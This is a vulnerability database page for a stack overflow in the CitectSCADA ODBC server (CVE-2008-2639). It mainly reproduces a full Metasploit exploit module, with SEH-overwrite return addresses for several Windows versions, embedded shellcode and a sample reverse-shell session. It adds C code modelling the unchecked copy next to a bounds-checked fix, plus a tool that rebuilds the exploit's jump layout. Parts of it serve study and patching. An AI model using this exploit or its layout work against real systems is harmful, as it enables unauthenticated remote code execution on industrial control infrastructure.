CitectSCADA ODBC Server Remote Stack Overflow Vulnerability

Vulnerability ID 1116023 Type Buffer overflow
Published 2008-09-05 Updated 2008-09-08
CVE CVE-2008-2639 CNNVD ID CNNVD-200806-217
Platform Windows CVSS score 7.6
|Sources
https://www.exploit-db.com/exploits/6387
https://www.securityfocus.com/bid/29634
https://cxsecurity.com/issue/WLB-2008060099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-217
|Details
CitectSCADA is software that provides monitoring and control functions in supervisory control and data acquisition (SCADA) systems. CitectSCADA and CitectFacilities include an ODBC server component that provides remote SQL access to relational databases. The ODBC server listens by default on 20222/tcp for client requests. Its application-layer protocol over TCP first reads a 4-byte initial packet that specifies the length of the data in the next packet, then reads a packet of that length from the same TCP socket; the first 5 bytes of that second packet are a fixed header. Once the second packet has been read from the network into a buffer, its data is copied into a fixed-size internal buffer on the stack. Because the length of the data read is not properly checked, the memory copy into the fixed-size stack buffer can overflow, allowing an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. No credentials are exchanged before the oversized message is accepted, so the exploit below needs nothing beyond network reachability of 20222/tcp (its default RPORT).
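The read path the paragraph above describes, as an added example (this is not the advisory's text and not Citect's code): a C model of the ODBC framing with the unchecked copy next to a bounds-checked one. The wire format mirrors what the module in the exploit section sends (outer 4-byte big-endian length, 5-byte header `02 00 00 00 00`, inner 4-byte length, body). The stack buffer size `BODY_MAX`, the `FRAME_*` result codes, the `probe` helpers and the assumption that the copy trusts the outer length are mine; the advisory does not publish those details.

```c
/* Added example: not from the advisory and not CitectSCADA code. Models the
 * ODBC server framing as the advisory describes it and as the module sends it:
 *   [4-byte BE length][5-byte fixed header][4-byte BE body length][body]
 * The real stack buffer size and which length the copy trusts are unpublished;
 * BODY_MAX and "the copy uses the outer length" are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HDR_LEN  5
#define BODY_MAX 216   /* assumed; the module's 'Space' values suggest a few hundred bytes */

enum { FRAME_SHORT = -1, FRAME_TOO_LONG = -2, FRAME_BAD_HDR = -3 };

/* Stand-in for the TCP socket: an in-memory byte stream consumed in order. */
typedef struct { const uint8_t *data; size_t len, pos; } stream_t;

static int stream_read(stream_t *s, uint8_t *out, size_t n) {
    if (s->len - s->pos < n) return FRAME_SHORT;   /* peer sent less than promised */
    memcpy(out, s->data + s->pos, n);
    s->pos += n;
    return 0;
}

static uint32_t get_be32(const uint8_t *b) {
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) | ((uint32_t)b[2] << 8) | b[3];
}
static void put_be32(uint8_t *b, uint32_t v) {
    b[0] = v >> 24; b[1] = v >> 16; b[2] = v >> 8; b[3] = v;
}

/* VULNERABLE: the length read off the wire is trusted all the way into a
 * memcpy onto a fixed stack buffer. A message longer than HDR_LEN + BODY_MAX
 * runs past body[] into the saved frame and SEH record, which is what the
 * module below exploits. Only call this with benign input. */
static int handle_frame_vulnerable(stream_t *s) {
    uint8_t lenbuf[4], body[BODY_MAX];
    if (stream_read(s, lenbuf, 4) != 0) return FRAME_SHORT;
    uint32_t msglen = get_be32(lenbuf);
    uint8_t *msg = malloc(msglen);                  /* attacker-sized allocation */
    if (!msg || stream_read(s, msg, msglen) != 0) { free(msg); return FRAME_SHORT; }
    memcpy(body, msg + HDR_LEN, msglen - HDR_LEN);  /* no check against sizeof body */
    free(msg);
    return (int)(msglen - HDR_LEN);                 /* body bytes accepted */
}

/* HARDENED: reject the frame before allocating or copying anything. */
static int handle_frame_hardened(stream_t *s) {
    uint8_t lenbuf[4], body[BODY_MAX];
    if (stream_read(s, lenbuf, 4) != 0) return FRAME_SHORT;
    uint32_t msglen = get_be32(lenbuf);
    if (msglen < HDR_LEN)               return FRAME_BAD_HDR;
    if (msglen - HDR_LEN > sizeof body) return FRAME_TOO_LONG;
    uint8_t *msg = malloc(msglen);
    if (!msg || stream_read(s, msg, msglen) != 0) { free(msg); return FRAME_SHORT; }
    memcpy(body, msg + HDR_LEN, msglen - HDR_LEN);
    free(msg);
    return (int)(msglen - HDR_LEN);
}

/* Builds one request the way the module's `wakeup` and `len` lines do.
 * out must hold body_len + 13 bytes; returns the frame length. */
static size_t build_frame(uint8_t *out, const uint8_t *body, uint32_t body_len) {
    static const uint8_t hdr[HDR_LEN] = { 0x02, 0x00, 0x00, 0x00, 0x00 };
    uint32_t msglen = HDR_LEN + 4 + body_len;
    put_be32(out, msglen);
    memcpy(out + 4, hdr, HDR_LEN);
    put_be32(out + 4 + HDR_LEN, body_len);
    memcpy(out + 4 + HDR_LEN + 4, body, body_len);
    return 4 + msglen;
}

/* Feeds a constructed frame carrying body_len bytes of 'A' to one handler;
 * vulnerable != 0 selects the unchecked one. Returns the handler's result. */
static int probe(uint32_t body_len, int vulnerable) {
    uint8_t *body = malloc(body_len + 1), *frame = malloc(body_len + 13);
    memset(body, 'A', body_len);
    stream_t s = { frame, build_frame(frame, body, body_len), 0 };
    int rc = vulnerable ? handle_frame_vulnerable(&s) : handle_frame_hardened(&s);
    free(body); free(frame);
    return rc;
}

/* A constructed frame whose prefix promises 100 bytes but delivers two. */
static int probe_truncated(void) {
    static const uint8_t frame[] = { 0x00, 0x00, 0x00, 0x64, 0x02, 0x00 };
    stream_t s = { frame, sizeof frame, 0 };
    return handle_frame_hardened(&s);
}

int main(void) {
    printf("16-byte body, vulnerable handler: %d\n", probe(16, 1));
    printf("16-byte body, hardened handler:   %d\n", probe(16, 0));
    printf("600-byte body, hardened handler:  %d\n", probe(600, 0));
    printf("truncated frame, hardened:        %d\n", probe_truncated());
    return 0;
}
```

The two handlers differ only in where the length is checked: the hardened one validates `msglen` before the attacker-sized `malloc` and before the copy, so an oversized frame is dropped without touching the stack buffer, and a frame that promises more bytes than the socket delivers fails as a short read rather than blocking or copying uninitialised memory. `probe(600, 0)` is the shape of the module's `mal` buffer; `probe(600, 1)` is deliberately never called.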
|Exploit (EXP)
##
# $Id: citect_scada_odbc.rb
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
# 
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101  TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
# 
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\Program Files\Citect\CitectSCADA\Bin>
# 
# Arbitrary code has been successfully run on Windows XP SP2 and SP3, Win98 SE and Windows 2003 Server SP1
#
require 'msf/core'

module Msf

class Exploits::Windows::Misc::Citect_SCADA_ODBC < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CitectSCADA ODBC Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in CitectSCADA's ODBC daemon.
				This has only been tested against Citect v5, v6 and v7. 
			},
			'Author'         => [ 'KF <kf_lists[at]digitalmunition.com>' ],
			'Version'        => '$Revision: 1 $',
			'References'     => 
				[
					['CVE', 'CVE-2008-2639'],
					['BID', '29634'],
					['URL', 'http://www.schneider-electric.com/sites/corporate/en/press/press-releases/viewer-press-releases.page?c_filepath=/templatedata/Content/Press_Release/data/en/shared/2005/10/20051019_schneider_electric_adds_scada_and_mes_capabilities_to_i.xml'],
					['URL', 'http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability'],
					['URL', 'http://www.auscert.org.au/render.html?it=9433'],
					['URL', 'http://www.controsys.hu/anyagok/group_quality_assurance.pdf'],
					['URL', 'http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					# Small sample of potential targets... There ARE universal targets for *some* versions. The base address can vary unfortunately.
					['CiExceptionMailer.dll on XP Sp2 or SP3 5.42',     { 'Version' => '5.42',    'OS' => 'xp',    'Ret' => 0x003a530e, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],
					['CiExceptionMailer.dll on Server 2003 Sp2 6.0-r0', { 'Version' => '6.0-r0',  'OS' => '2003',  'Ret' => 0x003a6aad, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212  } } ],    
					['CiExceptionMailer.dll on XP Sp2 or SP3 6.0-r0',   { 'Version' => '6.0-r0',  'OS' => 'xp',    'Ret' => 0x0039cd5a, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],    
					['CiExceptionMailer.dll on XP Sp2 or SP3 6.10',    { 'Version' => '6.10',    'OS' => 'xp',    'Ret' => 0x00501113, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380  } } ],  
					['CiExceptionMailer.dll on XP Sp2 or SP3 7.0-r0',   { 'Version' => '7.0-r0',  'OS' => 'xp',    'Ret' => 0x003e1e92, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380  } } ],  
					['CiExceptionMailer.dll on 2003 Server SP1 7.0-r0', { 'Version' => '7.0-r0',  'OS' => '2003',  'Ret' => 0x003d59d7, 'Jump' => 0xfffffe7be9, 'Payload' => { 'Space' => 376  } } ],  
					['CiExceptionMailer.dll on Win98 5.50-r0',	    { 'Version' => '5.50-r0', 'OS' => 'win98', 'Ret' => 0x006dd8b7, 'Jump' => 0xffffff6fe9, 'Payload' => { 'Space' => 140  } } ],  
					['CiExceptionMailer.dll on XP SP2 5.50-r0',	    { 'Version' => '5.50-r0', 'OS' => 'xp',    'Ret' => 0x003a5e90, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],  
					['CiExceptionMailer.dll on 2003 Server 5.50-r0',    { 'Version' => '5.50-r0', 'OS' => '2003',  'Ret' => 0x003952ee, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212  } } ],  
					['Test Crash',	  			            { 'Version' => '666',     'OS' => 'test',  'Ret' => 0xdeadbeef, 'Jump' => 0xdeadbabeee, 'Payload' => { 'Space' => 8192 } } ],  
				], 

			'Privileged'     => false,
			'DisclosureDate' => 'June 11 2008'
			))

			register_options(
			[
				Opt::RPORT(20222)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		if payload_space() != payload.encoded.length
			print_status("Metasploit payload bug... please check out from SVN")
			disconnect   # abort this run only; `exit` here would kill the whole framework process
			return
		else 
			print_status("Space: #{payload_space()}")	
		end

		shortjmp   =    0xeb069090      # jump over garbage for SEH foo

		if(target['OS'] =~ /xp/)
			print_status("Using Windows XP Target")
		elsif (target['OS'] =~ /2003/)
			print_status("Using Windows 2003 Target")
		elsif (target['OS'] =~ /98/)
			print_status("no 98 foo yet")
		else # only the 'test' OS remains
			print_status("Just testing.... don't mind me")
		end
	
		padding = 100  # Just fill up the end of the stack... 

		# There is some redundant shit here... will be cleaned up soon enough... 
		if (target['Version'] =~ /5.42/) || (target['Version'] =~ /6.0-r0/)
			filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
			mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
		elsif (target['Version'] =~ /6.10/) || (target['Version'] =~ /7.0-r0/) 
			filler = [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
			mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
		elsif (target['Version'] =~ /5.50-r0/) 

			# This particular target encompasses win98, windows XP and windows 2003 just so that no one feels left out. 
			# EVERYONE *CAN* be exploited... not just the guys running the modern stuff. Someone only needs to take a bit
			# of time to have a robust exploit for any platform or version they choose... 

			if(target['OS'] =~ /win98/)
				hop1 = 0xebb69090     # Short jump (EB B6, -74) back into the small 72 byte buffer space
				hop2 = target['Jump'] # Near jump into beginning of entire buffer... leaves 140 chars of space. 
				seh = [target.ret].pack("V") # Call EAX from CiExceptionMailer.dll
	
				# Description : It is 110 Byte Shellcode which Pops up Message Box Under win98
				# This is just sample code from the milw0rm...its using static addresses from MY win98
				hell = 
				"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" + 
				"\xd0\x76\xf7\xbf" +   # LoadLibraryA(libraryname) IN win98
				"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb" +
				"\xa8\x6d\xf7\xbf" +   # GetProcAddress(hmodule,functionname)
				"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51" +
				"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff" +
				"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" +
				"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" +
				"\xff" + "PWNED." + "\x4e"
				mal = "\x90" * (payload_space - hell.length) + hell + [hop2].pack('Q')[0..4] + "Z" * 67 + [hop1].pack("N") + seh + "\x41" * padding
			elsif target['OS'] =~ /xp/ || target['OS'] =~ /2003/
				filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
				mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
			end

		else # only the 'Test Crash' target (Version 666) remains
			# Use this to find offsets for other versions that were not provided. 
			mal = Rex::Text.pattern_create(payload_space, Rex::Text::DefaultPatternSets)
			print_status("Use pattern_offset.rb to find the length")
		end	
	
		# Open your eyes people... listen carefully to the rhetoric. There is no spoon. 
		wakeup = [0x0000000002].pack('Q')[0..4] + [mal.length].pack("N") + mal

		len = [wakeup.length].pack("N")
		sock.put(len)
		sock.put(wakeup)
		print_status("Sent malicious ODBC packet...")

		handler
		print_status("Citect and other SCADA and Control vendors have been communicating potential " +
			"vulnerabilities of control systems when they are connected to the internet for some time. ")
		print_status("However, Citect believes this is only relevant to a company using ODBC technology and " +
			"directly connecting its system to the internet with no security in place -") 
		print_status("a situation unlikely in today’s business environment. ")

		disconnect	
	end

end
end

# milw0rm.com [2008-09-05]
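Control flow of the SEH overwrite the module builds, as an added example that is not part of the module or of the original page: it rebuilds the byte layout sent for the XP/2003 and Win98 targets from the module's `Space`, `Ret` and `Jump` values and follows the `eb 06` / `e9 rel32` hops the way the CPU would once the handler at `Ret` transfers control into the overwritten record. `layout_xp2003`, `layout_win98`, `follow_jumps`, the `landing_*` wrappers and the `0xCC` placeholder for the payload bytes are mine; the decoder understands only the two jump opcodes and `nop`, which is all the layout contains.

```c
/* Added example: not part of the module or the original page. Rebuilds the
 * overflow layout the module sends for the CiExceptionMailer.dll targets and
 * follows the control flow the SEH overwrite sets up:
 *   [payload, Space bytes][nSEH: eb 06 90 90][SEH: Ret][10 NOPs on some targets][e9 rel32][padding]
 * When the handler at Ret transfers control into the record, eb 06 hops over
 * the SEH pointer and e9 rel32 jumps back toward the buffer start. The decoder
 * knows only eb, e9 and nop, which is all the layout contains; payload bytes
 * are stood in by 0xCC. Space/Ret/Jump values passed in are the module's. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PADDING 100   /* the module's `padding` */

static void put_le(uint8_t *out, uint64_t v, int nbytes) {
    for (int i = 0; i < nbytes; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* XP/2003 targets: nop_prefix mirrors the "\x90" * 10 used for the 5.42,
 * 6.0-r0 and 5.50-r0 targets; jump64 is the target's 'Jump' (e9 + rel32,
 * emitted as 5 little-endian bytes exactly like pack('Q')[0..4]). */
static size_t layout_xp2003(uint8_t *out, size_t space, int nop_prefix,
                            uint32_t ret, uint64_t jump64) {
    static const uint8_t shortjmp[4] = { 0xeb, 0x06, 0x90, 0x90 };
    size_t n = 0;
    memset(out, 0xCC, space);               n += space;   /* encoded payload */
    memcpy(out + n, shortjmp, 4);           n += 4;       /* nSEH */
    put_le(out + n, ret, 4);                n += 4;       /* SEH handler */
    if (nop_prefix) { memset(out + n, 0x90, 10); n += 10; }
    put_le(out + n, jump64, 5);             n += 5;       /* e9 rel32 */
    memset(out + n, 0x90, PADDING);         n += PADDING;
    return n;
}

/* Win98 5.50-r0 target: shellcode region, hop2 (near jump to offset 0),
 * 67 'Z's, nSEH = hop1 (eb b6: short jump back by 74), SEH = Ret, padding. */
static size_t layout_win98(uint8_t *out, size_t space, uint32_t ret, uint64_t hop2) {
    static const uint8_t hop1[4] = { 0xeb, 0xb6, 0x90, 0x90 };
    size_t n = 0;
    memset(out, 0xCC, space);               n += space;
    put_le(out + n, hop2, 5);               n += 5;
    memset(out + n, 'Z', 67);               n += 67;
    memcpy(out + n, hop1, 4);               n += 4;       /* nSEH */
    put_le(out + n, ret, 4);                n += 4;       /* SEH handler */
    memset(out + n, 0x41, PADDING);         n += PADDING;
    return n;
}

/* Follows eb rel8 / e9 rel32 hops from offset pos, stepping over 0x90.
 * Returns the offset of the first non-jump byte reached, or -1 if a hop
 * leaves the buffer or more than 8 hops are taken. */
static long follow_jumps(const uint8_t *buf, size_t len, size_t pos) {
    for (int hops = 0; hops < 8; hops++) {
        while (pos < len && buf[pos] == 0x90) pos++;
        if (pos >= len) return -1;
        int64_t next;
        if (buf[pos] == 0xeb && pos + 2 <= len) {
            next = (int64_t)(pos + 2) + (int8_t)buf[pos + 1];
        } else if (buf[pos] == 0xe9 && pos + 5 <= len) {
            uint32_t rel = (uint32_t)buf[pos + 1] | (uint32_t)buf[pos + 2] << 8
                         | (uint32_t)buf[pos + 3] << 16 | (uint32_t)buf[pos + 4] << 24;
            int64_t srel = (rel & 0x80000000u) ? (int64_t)rel - 0x100000000LL : (int64_t)rel;
            next = (int64_t)(pos + 5) + srel;
        } else {
            return (long)pos;                       /* landed on payload (or junk) */
        }
        if (next < 0 || next >= (int64_t)len) return -1;
        pos = (size_t)next;
    }
    return -1;
}

/* Where execution ends up after the SEH handler fires, for one target. */
static long landing_xp2003(size_t space, int nop_prefix, uint32_t ret, uint64_t jump64) {
    uint8_t *buf = malloc(space + 4 + 4 + 10 + 5 + PADDING);
    size_t len = layout_xp2003(buf, space, nop_prefix, ret, jump64);
    long where = follow_jumps(buf, len, space);     /* control arrives at nSEH */
    free(buf);
    return where;
}

static long landing_win98(size_t space, uint32_t ret, uint64_t hop2) {
    uint8_t *buf = malloc(space + 5 + 67 + 4 + 4 + PADDING);
    size_t len = layout_win98(buf, space, ret, hop2);
    long where = follow_jumps(buf, len, space + 5 + 67);   /* nSEH sits after hop2 and the Z's */
    free(buf);
    return where;
}

int main(void) {
    printf("5.42 on XP:       lands at %ld\n", landing_xp2003(216, 1, 0x003a530e, 0xffffff11e9ULL));
    printf("7.0-r0 on 2003:   lands at %ld\n", landing_xp2003(376, 0, 0x003d59d7, 0xfffffe7be9ULL));
    printf("6.10 on XP:       lands at %ld\n", landing_xp2003(380, 0, 0x00501113, 0xffffff11e9ULL));
    printf("5.50-r0 on Win98: lands at %ld\n", landing_win98(140, 0x006dd8b7, 0xffffff6fe9ULL));
    return 0;
}
```

For the 5.42, 6.0-r0, 5.50-r0 and 2003 7.0-r0 targets the near jump lands exactly at offset 0, the first payload byte. For XP 6.10 and XP 7.0-r0 (Space 380, Jump `0xffffff11e9`) it lands at offset 154, well inside the payload region; that still works because Metasploit fills the unused Space with a NOP sled ahead of the encoded payload, which is also why the module refuses to run unless `payload.encoded.length` equals the target's Space. Changing one `Jump` constant and re-running `landing_xp2003` is the check to do before adding a target with a different Space.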
|Affected products
Citect CitectSCADA 7, Citect CitectSCADA 6, Citect CitectFacilities 7 (the module above also carries targets for CitectSCADA 5.42 and 5.50)
|References

Source: US-CERT
Name: VU#476345
Link: http://www.kb.cert.org/vuls/id/476345
Source: XF
Name: citectscada-odbc-bo (42992)
Link: http://xforce.iss.net/xforce/xfdb/42992
Source: BID
Name: 29634
Link: http://www.securityfocus.com/bid/29634
Source: BUGTRAQ
Name: 20080611 CORE-2008-0125: CitectSCADA ODBC service vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/493272/100/0/threaded
Source: MILW0RM
Name: 6387
Link: http://www.milw0rm.com/exploits/6387
Source: www.kb.cert.org
Link: http://www.kb.cert.org/vuls/id/CTAR-7ENQNH
Source: VUPEN
Name: ADV-2008-1834
Link: http://www.frsirt.com/english/advisories/2008/1834/references
Source: MISC
Link: http://www.coresecurity.com/?action=item&id=2186
Source: SECTRACK
Name: 1020241
Link: http://securitytracker.com/id?1020241
Source: SREASON
Name: 3944
Link: http://securityreason.com/securityalert/3944
Source: SECUNIA
Name: 30638
Link: http://secunia.com/advisories/30638
Source: MISC
Link: http://isc.sans.org/diary.html?storyid=4556